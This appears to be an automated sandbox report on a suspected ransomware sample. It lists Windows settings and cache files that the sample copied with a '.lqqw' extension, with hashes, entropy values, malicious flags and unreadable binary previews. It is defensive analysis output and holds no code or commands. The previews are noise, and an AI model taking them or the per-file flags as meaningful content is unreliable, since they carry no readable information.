                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978529986156137
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:5oWO4icPTMj5Fi+5gYMKqckAycqRzaY6K6Cv86MoQHi:5UmM5s+5gXPpRzaY6pFoQHi
                                                                                                                                                                                                    MD5:F6F966C214AA4C39236352B1F7E7DE6B
                                                                                                                                                                                                    SHA1:748DDEB26985DD5CE44571C823E79EFFB4761444
                                                                                                                                                                                                    SHA-256:64B7E47BAF9EE525843A387C63B0D1F4F8E20955C39C3F33ACA7FB6FF67DC908
                                                                                                                                                                                                    SHA-512:0448F5F6AD60BA8CD0F9C420AD3F2DD491D48BBCDB7D5F68075D132652C2A29DFA9FB60208C8382CE34D44609FC3953904E79F64BDFC5E5A9CBEEBA8B14D81C6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: +.uun........O............Dc.`.R....bJ/*(u"...8.$i,./..2...-L.@..j......hY_.C~.zS.D..R.4!H...Qj./L..j.......b.&k..7Z....4_..G.........ic[.am'.y!..X.........R.7`.}...N..n..$D.{....:..D.x........A6..W....2.......O.....J8.9.)..i..@..x.F0i.^.+b........I....H...8.E.i.ZS.W....o.o....Y.Ph?.Z.m...6.tT..M. ..1u.9....G+.O...k7....hO..3.h.(6....0.W...jY..B..5f..........{.8....}...S.a.....Y.O.......9.......y31.B.1U.a#...pQ..~...I...R[Y.q.....i.u..".p.s.Y.Vm....ut.$..K>.n...A.Iu..?.,.S;w34.M7R.[...G.#.D1J.6;_H..+..+.o..a.@8Sk.U/.........%..y."|v.@.ed......c.w.3?E..l.../.`9.^.y.Q..87..v..~.M..{..F!..3.-Y.ESYb#V..B......P.%!...Rz.S.^...$..(yv3..uN..X..l..@..\.......82..b...3.\..A/.91.v....Z.o..^*.....I@.+.....8..o9..6..Q.A..........T.aO&.k....x....Y.X3....V._%....X.l.........]..+.s...".S....\s_!7.]..Rk..8}.9..(;K&.../4LL.'.......*..E`h.C..8......[q......-kSQ...Y..).W.4n.x..X....p.I2i..6....MD..\..*.8.s..aW.|C...:.....or.P.HH.y..[.q%.l....6..H-./.o...#7
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977955510562701
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:cJHIQimKovwoS+lwbbjf4sgXBxRdxg4wIRhK57wSW8yeJS:2HNKoBHlUfQvpXZi5xEeE
                                                                                                                                                                                                    MD5:947B2660D538BB1F9A923AE580884D67
                                                                                                                                                                                                    SHA1:2607FE6E2FDA817016A70C05F7531A6CD5FF2CBE
                                                                                                                                                                                                    SHA-256:2DC9A45A7C5611F41CBC360E435C86470327E9B13F56A1E9088E321B4AFE09F8
                                                                                                                                                                                                    SHA-512:46E6C50F647B3BACE95C8E22FB81040C5B6A79B472868989C2C286EE7A017F001BF7E3202E9B34B2E4067B711F91B48DC0B0BB25DA88C9BBDE3CF92B4B201021
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..NB....'c.T`6..S.@. @...C..t...&C.V...#..:2.RE.@...I....a.jN*....u.K.o.J....EW...;.b.2..z;....+b.U.."..Tz.y..y#......E.......?.K0?.@.....C....4....d$..)C+..G.'bV^...@... .q...:..:j.."/...s.)...X.....p..wi....f.1..N.Dd...".....X....}......Bz.n.=Ir......o.Xg...5}q.z....+..ZZ.'C.b.v?~ff.q,.u8B...8..<= dcWX..hD>...L!&...$. 8:.9b.,,'..f.4.BS9..4dr......(.'.-......le.f.r}s..\...[<..._([...G...dc...u....a.*..]..q_S..._.2F"..q.W....+.~..3..Cke.|.~w.N..NVQP..s...E.|.y.../4V2S............V.|.Ow.L..4.tL..$.....-.{5.>m.......P>V.$.....%T...uS...l.k.Z......@].kCv..i......^~.....z.)....2i.7.....i....q.kR...J.D.rK,\.....N8.._.I.#.?..^!..ky...s,#.^.......Np.W....U..V..E...$PY......C+.>.+z..xvX.Wu!^.U....s...|.[[..k...[..RTk\.f.[......=..ra..SC......;BM.c...O....{ &r..i....9<z.Y..J...%..x....{.T..)..ep*0.....f.;..e^.z...........L......j..y>..MNyW......J............u....<.....q&.....[.EO.w.Z.=F.B...^H...a..\.g...............7U..E.h.$g..."h..1H..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978737566724582
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:wfEMzQbnuo+PMSmrdqufSTWnPWcNty9nCbH+Bp0sUrl:w7Mnuo60PWV5C29Uh
                                                                                                                                                                                                    MD5:CD89F00453BB2C14B297B75DC12B313A
                                                                                                                                                                                                    SHA1:25FAB220476CC45F4D1403804D8AF7554276D9BC
                                                                                                                                                                                                    SHA-256:576072D5D40D93BE0FC330E5CF8AD1879976E9D3E671722F41CFF2E7B65E9E54
                                                                                                                                                                                                    SHA-512:9E03032F03A1737084FB2809017E574B1914035091CF43768F5C80EF3093D7B91D938A2BF6EB42F05881D45B8B0EAFF0BC055ECB24F2D7A75FA186134AA8E05B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...3...#).F...(..'.....[.NB.p..,...(...q../.[d.....K|1f..L.q...z;w.YT.O.=F.fS.CfR2....>..i..3..C.P^.?Z..+S.k....c.T...4...../U......SV...g..<..q<v1(.XE..#J...o.^..lOH4:..G.&..8.{..;..d68Y..Fj.)..<..u.m....Y..>.....HV.9....K%2_l..;.t. }.C..J.{MQSw..)og..pN..g+."........d.:.q...k.>.!!z.k15.n+`0...L.,.[....l .^..7. #b_..=>.(../..e......G..V....`8...|.T.Sz.s.Y. }..<^.....S.. Kkc..&....#..#.H...!.D.<...+........{=.../.jn-...Q.G.fW.M..P".........q...Q.f^,pb....1..F...?.L.{n../.aO....%\a=./...s.q.....C.d..,D.p..P...SI.zD.W..'n.?3.B)......../5.t):.@..7?6m..G..IL..}.9..~.......S../.].X.:.........H.E.C..,....W..Y..65...+3...B4....+...97.t..r.}...yx.E.G.* k..._.7b...5/]^$.W.-}/?....5....].c.$#..f.h..@..>.7..u.#..7.H.9....r1....q:{r...4.]..+U.j.\X..T$..C4.$..B..r#..{1>@.!>3z3..{..tb..X.(.YA8n......_s..q"Y....7..d.Tm5...u.}.."D...zi....W.[.+.Ug......{v1.?I./^...u.......+..4.#A-..A=H5....."...-2.e..I.....O.%.....J..5X..X9u.,.{INu..&/0;P.k.+.....7..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976682342822029
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:EKIUPzVKU76z0sVQUKBKMfZHMqOQ1mUUS:4izl764sRKoMhWQ1mUX
                                                                                                                                                                                                    MD5:17167CFD2CDD13D9473DCBD6027CABA0
                                                                                                                                                                                                    SHA1:B87F98D3BE847BCF3E188F3B482109CF3E5649A2
                                                                                                                                                                                                    SHA-256:7AB460CE9897074FCDBAFE0D9D9D7034CAD35B214C68C8837765BF47E54A9C2D
                                                                                                                                                                                                    SHA-512:BF5B44D0668806490099E2C69A2551428AFC602B3680164A2C81438DBA98D0319A131BAC61415649530433642EB88BA1B4BF8B11E41D75D5077F5645659D7F51
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .8&...0..P 223.8.d8....'.I.r.....[.*...Nt{.)..K.t~.Ga...9.7.d..!.]\..>..\./..<...Vd[.h..x..5.@.E...+0.0.4.$..(...p......O}..C-.k..#..m....Q.....-.q.!.;.<O..yW.F..w....7........,&...RM.;........`..Yx..k..I...T.U...@..t{..V....Qb.".....T8B......[.t>$!....\...bD.s^.~{.."H}.`...+...J.kg.z....d....!k.>.a.........#.E.......K..6_..{.P.5..'.71...{....d(\.i...fz$..L.+..g...}S.n....N[._x..O....l...6&.h5...u..4Q(..A.t..\..6.........H]..pX.~d.U..}.b....wQ...'f.2).a......M'.I.#3....G.y../Z:.....J..........x...UJ.>.)\......y....@`.#w^...@5r..}..[K..1....FG..>.k..4....+.gNsm..T..s..$C..~dH....V......c....#].[.......q...%.'?U....@..3eL...Ed...Xrh.s.....,n.b.....O./....... ..B..4N}..h.[....N... ..8A.]..?+.tD...?........vs.....iW.H.;.Q...6...pY.a..@........C.S8.i.\(..J.0.Z......L.e^...W...E4......_.kD..x....]..A.G.O*...C..../.......8l..s....]..DJ..b..^=L....aI..................V.......B.s^mI*.&.. .....0.yG.P...xpM..b..*./.. .k,D.Jp.....u...4../q
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980546030373587
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:GzqZlkzo1zphZTi+XjxQ5SiAl+PgGh0cMemh8n:GIp3hRi+XjxT0Pccz1
                                                                                                                                                                                                    MD5:98A995329B0EB44C62A5C56140BC4D03
                                                                                                                                                                                                    SHA1:2D3726D117F5C2CC3D63629B0D90B422006F8CB0
                                                                                                                                                                                                    SHA-256:87152E42676DA0E0F589FB0462A84918C6306C75AF3835E8FA450DEA4DD66367
                                                                                                                                                                                                    SHA-512:7B32A25CA723E4A91D19C4F3EB8AE1FD9F9C1DCA8BA7F4B569E6589CDEA2E46D076E0937677232273B6EB99913EC04D77E72A0103CC25FDA2B65F718F9ED63A9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....0..7H.8.kv1u.A...S..r.IN$......~t...........Z...F...........Q..........=.a..*.t...f.G.n.4EC..Z../Z.m#....._F.!. .[~:^..G..t.....3p.)...A....AH.....i....i ...c.....GO[............2H..^..EkX..w.XS.3v...{v.w..-.8.sk...x.~.:...pUP.G....F...sp..Ch....tKGr#..={...$......-I.G+.3.@i.ld1...;...(..R...;u........[....<...!A|......erA}..v.....+..86...[.......yWIe..&8.h..bf."..T.....Z...Xb......9..N...P8.[.>B.!...h..(..x.......to.I..u..^^~..'kSU..p1.U.....C..hw.>;F.TXr:L.*..b.c.../=.....Q..XH..6,[....m.....S@......9d.?.@G..-cv)i%9.;e..H o@]...-....>......*x.e.c.n.. ..C.k.iY.zw7...(s...nq.-%4 ..d+P...ip..H.~+n...:..E.Z.....0.++.c.n..T.$......!O2.....>.w.....d...\......w.....=.)"65...:...8..S...u.%j.`K....gh1..8&....].?.m?"....i.u.:.`....q.Cb..IG......K..n.4..B./.>.....Fb....E..cP.a..'k.y..AR..}.<..........[.y._6.pCP../.].M#.+.M..{j6a.aD+b].v$>......s..E..F...0..9}..sO^.i.u.z.;.(.x.......e..,.;3e....B..n.<..; .x.r..h.}.^pR...s.cy.tN.Dq-...J%.....>.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):88722
                                                                                                                                                                                                    Entropy (8bit):7.998054064651053
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:+5gn4FsMrZ1pTfxU+mZFxjFejhyKoLBidyYuZNkeSLlUgiM9K5Opz4Pw9CmI:LnjMd1MlZwjM9BidyBZmBF/EpmI
                                                                                                                                                                                                    MD5:4558EE35294CED16E615D7038D01775E
                                                                                                                                                                                                    SHA1:C8B384549CD1AB5133B7FAFF49613C0E49371C0C
                                                                                                                                                                                                    SHA-256:BEEFDAC9C0F7FBBCC25FCD96FACE6B5E4F40E1523471801A50BB8F7721E8F25E
                                                                                                                                                                                                    SHA-512:CDFF3BDE96C8B6D6E626747D98DB685727FB6B2B7CDBB7F9E2A9924274AD4E73576D0C75254AFE7F95582ABC1BAB232AB35AB9B99092FDA008ED272EA65DF8A8
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ,7.D.F@.-.......@..$>..i.W...7d.FXb.HF._..t..`<~..".PNET..Jt.pYP..x.6.v.3n.J.1.Ja.I.7i..*.8.....Q.......x!-d...0l.8...$jj.$h......E6.....e.3b..dE.....w..y.[ .TdSY..O..........3...EM.p%H.H.g.Y&].*..v..].....)5v.o8..f.R....-.mGR>.....kH..{...!...V...]Z.......&`.....b)..7.7.........F...R....9<... $.i..#.^n.R.?!-..j....X...A.........q..w.#....A....s.8...!.f.Z..I....L...G.25b8......Vr......N....8..Z...,..$.V.r>.C....HP$J..=.....d....6......R...Q.N. .A..M.OKF2.#..7.U.<....4.r...2..v.$.@.D..........i..Y.]..[.L..lC.-..d.7(..........z@.j'.@@#0e3-5.%..q?..<j...x.f.|.7..hd.!Gx{D...\....l.y.!......&8..........vS....F...'W.b..).~.j..oy~...VP.@....a......#......./Ho.....N{.&........`t..~.z.X:}..I...D...z.iW....a..c..aYHpX.o#}..X;$.!....R%ws..$".^.....S^...C...Q7...ntPIbI.v.^N...'....E.l.........}.s.3.......Ym....S..)I..wbW..O.AI.^..%r.....H.....;..p6)3.+..u@..zS...:.F...m.L...{..L.3....Z_`...<......Fs........!.=m.d..h...':.0.7....{.D.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):37193
                                                                                                                                                                                                    Entropy (8bit):7.995174188925884
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:Wup5V94Hmc+coEat0+I5C64O4DSWjBTnk/x1JzknBnmnB/6+/:Wu/ViHovtX8OqaTQLknB9+/
                                                                                                                                                                                                    MD5:EF321C597A772419C1CF8EA0BC2EC10A
                                                                                                                                                                                                    SHA1:C29F84BBAE1E27A13359C3C8F02A283ED5B7D25C
                                                                                                                                                                                                    SHA-256:0ACD908F79007A93C8DEEF02CB86A8A024EDF5CD537C368F99E3CBB9C4EE4CAF
                                                                                                                                                                                                    SHA-512:AA6C07334483696753416B6ED01E934E7F7C86852FEE8F070B34A1F7067C77E38853989331A5BABD6FB8AAECB37D183C2A6FC5854418F6827063B11E296DF1DF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..]%8........<.....`.%|W..Co^.z.....k>.?>0.........."....R.VS.N....B../..X...3.5...4&..N..)......qS4...9._...^.HhA.....J.".;.d.fes....{T.....%[......@.b{..i6.".).d.\.$K.<.....&....hq}o.>.q....9.J...]...a.G...YK.vD.[.......q..B...xM....7.r.P..E....Z..i...9...p./&....CK..*.8.JG7..C.C.S....qO.W.Q..hSN..[.F.....a..S.....?}pbUR'..=.^...J.....q..t....{.R......X..X..L..2..x..|9j`.I[.D....I..y/..}9..}.@..Fe".6&.Y.HG\....#.0+.w.1...~.+y..G....Py..n....W.....eZ.Y."#..(..h.9d..N......3..`Dg..[7..u.8...UP.Q..j.....c>7,.:'FB.r..[.R...tn$.....o;.t..Z."..BY[.....&.~..:.t. `'U%...........5.c.(..5wfH....}y.$i...o.k...hEs....L0....+...V.*.N....X*],..wY...#[.6..J!...t.+/...}g8....M.%b6.(..%.U.S.V.!{....|.S.....7,....1....%.................'..a.[!..(..F....;>..........c.V......[...|$.i..a._.\..5..Qp\`..|.E........}.?.L.4~"...;...[\..C...A....39.......X...;.n.4..k1..m$..Mk......t}..^._O..i7*...jM=.j.K...@\;.ux~..w.A8k.s.&p.!.^.B.vv2/Cc........
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):197266
                                                                                                                                                                                                    Entropy (8bit):7.999050275105391
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:6144:W9DkXs5TOcoogF0+Y2/RMFti13EQ6EOc0XcsmfSj:W9gXs5TOLogeGRMFtQ3V6EBsx
                                                                                                                                                                                                    MD5:44B4222B615AE395B1A10792002B7991
                                                                                                                                                                                                    SHA1:D66737900E0E2ED84A3947C2523E1401ECD661A1
                                                                                                                                                                                                    SHA-256:12D05060DAB78D8BF536267A67D10E2CDDB4ABB453755E54C12958FF22461668
                                                                                                                                                                                                    SHA-512:F4F7CD206B31F42A4F425025833589393E4C60DB8C0DF652F9624C7799DD6214DCE3B35E4F262364E562CBFEFE522FB6F2068A8E67997176BEB5021889DBB68E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..GBlb.!v.G%...)}...?....@q.N.!#...........f.5h(..|.ux....=3.....VV.r...PvZ....6............?d?j4..qB9.'A..J....a..[.f.;.."8.....]..-n...f0T....I~O{.E. 5.. ...U......d ....6..Zr........<C.x.5.eU..r.....@...`\..k.+..I........).N.P....cZ....h.ZA...>L.o...[.<.(...m...^......m.)N$k.-....\s+.....bP..N..:.\.?.Lp......._3.!.e....:cdgh.d...i%..o..+9....-$..n.%.=.%:>z..h<..y.....:.7.{P...a......5.p.6.0.P.....6...H..G!.......H....T.a.E.A66...7E..n.m...O.?=....[.,.\...+ .L^..2..4...*..k.5B.B.pF.r}..?...Y..Ja2......o.{.~..5.i..?.f%....a.YQ.%.jD..HQ}......w......u.c..d..pL...T......,....O...g.o....=.yA.a...E...[...^j..s..c....._.i.sX...q..;3{.c.......7.P.K....G8X.\ .8..".t........MP..5......O0.NV...K.:eO.@..3..C............).......^...#.4b..E..o.J...#.......T.G{...p.t...<..QQK.ygF...H7.a...>.....}....h)..*.........<TSgU7Id6T.3...N.{0.JQ..B.....!2W...:%L>.@..KX0.bq..C..Dm...A..h.....^.,..0(..&^.(O.q.....ue.{.:6EQ.q..O.y..B..*.U.;H%...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):69684
                                                                                                                                                                                                    Entropy (8bit):7.997167907560507
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:f4otNAr8QhZBAq2TDzbxFD843jdOX/LKh+Aqm4/jAC:9ArFhZBAlb3OPY+04/1
                                                                                                                                                                                                    MD5:748AA4C3C60CB27894DFF2B900E83A1C
                                                                                                                                                                                                    SHA1:22DF25DC71886D2802788C5997D5481D99BF8FCB
                                                                                                                                                                                                    SHA-256:0ED773B079254337FC3CE8B3FBF343FDE326666004EEE562CC445138E8D2F04A
                                                                                                                                                                                                    SHA-512:05A0CF83E39101A5127DD047E3208598605F65C26ED3FB1F7B8554661F3C59762ECDAC2DB97991AA15CB43601775F6C211CB676315FB57179F2C2F90F9820D87
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: -.A.6...N...^h...p.{..|.qF.5u7.i.\oK\b.6....=@}..Q..J1.o..+.....v....T..$.4..1`..h...^...jW.(...S....%K.F%..Bh~..z.,ns...v\S..}%..4... ...2XZ..C.|.d2_..J.#..H?..K.$.....n.I...f.c.'..<...f...H......_...."uH.@s..L.:0.....m&N....f3..6.'.2\..0..:....E7J..o..7...X...s.=.[..E..Y@.5.....a..O.e76i......ks....Z....1.D.S.N.../..P."B..b.Y..J..[.X0.1Be%.F{....s..~.vz..r.o.}..u&.#.5v.*`.....{.`.0...G'.(?....q.\.*c{S.F"..@.R.f.#R.<!k....?f..T..B.vX.J.........(....:..y.......{9.C..K...d.1...IH.......V4kqxEp(..J...}.DJ...a...i..3.@`^...L...F.....r...S..PHK^.$...U...loyD....R....P.O%...._..Y=...U.(;..&.fd.\.x....QR........O.....9..xXcg....P#....4...U..V....g63J...0.(2......7......4...(V...RUO.k..........*^.\.6.C......+.!.....{.P?..L.....=.m.H.g".6!.....0D........J.........I...[z....|..\.B..cW....5k...a...`..4."3._.~.E5-....D.;(?..%.;........ .Q..~..P.P...o.{...=.:.....eL]s.=b=..q.....b.....[.L.6.jTP.H..'..!z^N0.e.....W....."....G...CpC....g...r5..)L$.-4
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977127218981107
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:9iF4eZ8aQR87DLAPv/ynJ7BIZSBdf4vzzqsVcrb+/CybeFYM:Yi+QRCDQ4QQfqfLAcO7
                                                                                                                                                                                                    MD5:5F6398CB60058D54B3C8643E72B9D0BF
                                                                                                                                                                                                    SHA1:2797860ECB1C0C103BBCEE9E89228E059F5F48D6
                                                                                                                                                                                                    SHA-256:5AE02B0D36AC7CF0A4584C805689F65DAE9FEC3346477CCB01E0716C2E4FAABE
                                                                                                                                                                                                    SHA-512:D08C4C9519427249DC5DB6A4C8B5B061294829C551FCC59E73DB34D2828FC72568AB9639DDE9814697172A5C124A80546F4DD31F3395BD31011E5DFC85FB180F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .h..Y.#.(MN.7.1..f..LY.x....\..0.?.......`.n...\8....2....s19...M+..8..k...(M...(.!C.Lo..p9.!V$!........eMP\...F.x.............F......z......{.....r........y.........w..?.s,0.4uD....E...`...#.([.<S.fcE.......,8.`.OS.N<I;.....<....c...!3..Z..n@.u'.h..'../...H..j.DZ.Qf..!.1[?t^....5.O..5.+(.[X.z*.h@...."`io#_a.{.3...;.8..........{.X-....v.e.zg...3....S8 .!..bTi$..J.>`..{.]=~y..............S;....MM.@.6BL.!.L.........d.z7r..[.....).......W.A..I/w.......C..X2V...>[..".E...=.#....y..Xe)...\.+W.E..pA0..7q..3.....oA.uH..>>|..fBb.l$..........Y.$...=.`.......G.J..9U....}..w.)....)b;<..E.-".F..n[G7qAf....(....f. ........-~.7...o..8G.n.cK.H.suzjD..m...^...Yks.w%+mn.......^h=.GS...o..Mxq..o..........H3Na.L.../M*. c..0W.+S...f.~..1.........m.3./e+.4.s..y..U...\....I"M.?...R...o.Le.Y.lZ...C..S,......R.X-.c.......&...1..v..tk.......U5..5!H(..9.....1[Q..}IA5..A."-/\=D.K.-.|.....h..~T.....JA.so.....D..M....'...d..|.Ncu.x....,J.A.~._4..W.Pa.R
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.974131231133848
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:BGtzABaYAUlNq+cCAMus047+PZEVBrPMbYd:YtzA3fzq+cCAMn047VJd
                                                                                                                                                                                                    MD5:866721EB1D10CA073BBD31C531D7B82D
                                                                                                                                                                                                    SHA1:2C4743ABC49B3816636CAB6A928B6D0D72E9A47B
                                                                                                                                                                                                    SHA-256:5A393C3F82E6C41610E99DD274FC78B1B524E912A24739EF45908A4132527133
                                                                                                                                                                                                    SHA-512:304E968E4EA667748BABC75D34AC5392932A2A3B2E35119C1BCB7560C6ADF052426DC606705C2D43063459DDD45590EE75B1DDF0FD87A46EA1650DD56545A89B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: \D3>e.(...1.H...Q...K...^...^1._.J.G..l.....%:h..{.-.....*...}.1 .e@8..'.......^....>.jh....Q.\..5?rQm ...2...Z....{.........s....T..'....|...~...2..4...].l0%jW...=.?.Z....v..u%y..M.9..%e....1.qZcb.U...1....f...$.$.`.....H..R.CD...a..\%.q9!.$...:...>..aR......6.....Zl..F.`R.3...'5.1u...N......~..)...h..dc"......y.....N}f........)...Z...'../Ch...'......OpZ.Ze.7$.Q.o.....g.o..y...[.....`.Tr.e......x.o.|..>..`..Qs2.h..b......WT......k...Py\..CpW.3..f.KpX.."7.f.D..Y9.._eR.g....y..%..B...3...-.....Ql..Qd.cGi....,.o.YE...2v......m..j...[yQ.....M.H..S.I.[8p..PM2.|......k..0T....`.W.d.w....DyW...?.m.V.LR.R.ez..K>...Q..X9.k.xE.....I.4...'.E.............o....>..{9.N.n...-M>....8..$...O..%.+tJ......................Y..{g...GD..LV*...d..7.7xj..V._..TCVV.......S.x.)..,b;.z\z....**. ]....q...-vy=S\..9~[4...........9\+.......Y.x.....'9e.8t...m.l..ds..v:f@......V.G.J.5.0vc.I.T..(...{...7.o.25X..."...^....Nn.L..a.r)....f."......C.pf....U".+.-..i.=
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.979141031960251
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:UyLzYFDn5idQY3+3CYSqWH5qR323C9ewO1SWz0JsxGfFWSX3BvK5cu4:f4FDn0VyJSP8f0ksGFWyBdu4
                                                                                                                                                                                                    MD5:55915BB57B10D6D57AC6A22A193B4BBB
                                                                                                                                                                                                    SHA1:87C61C1B5393F29B2999056D2A8B5C84EF32F97C
                                                                                                                                                                                                    SHA-256:E755E47AECB0F26E2135AA60E1E8DF5E7F30B18C55AC78986BC787D9602D8277
                                                                                                                                                                                                    SHA-512:E5E61D96C8E8E54CA0490E29ED4D26395AD49EF66BA030AA90276D74572319CF4066DE02EC81B56E383EDADDF9056ED5F525A9A0551D994E874C8D9EDFEC7728
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
